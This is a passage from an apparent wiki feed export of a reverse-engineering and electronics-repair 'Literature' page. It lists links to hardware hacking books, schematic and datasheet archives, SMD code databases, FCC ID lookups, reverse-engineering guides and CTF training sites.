::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3173</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3173"/>
		<updated>2025-08-02T00:52:23Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add whycan Chinese embedded arm devel community.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
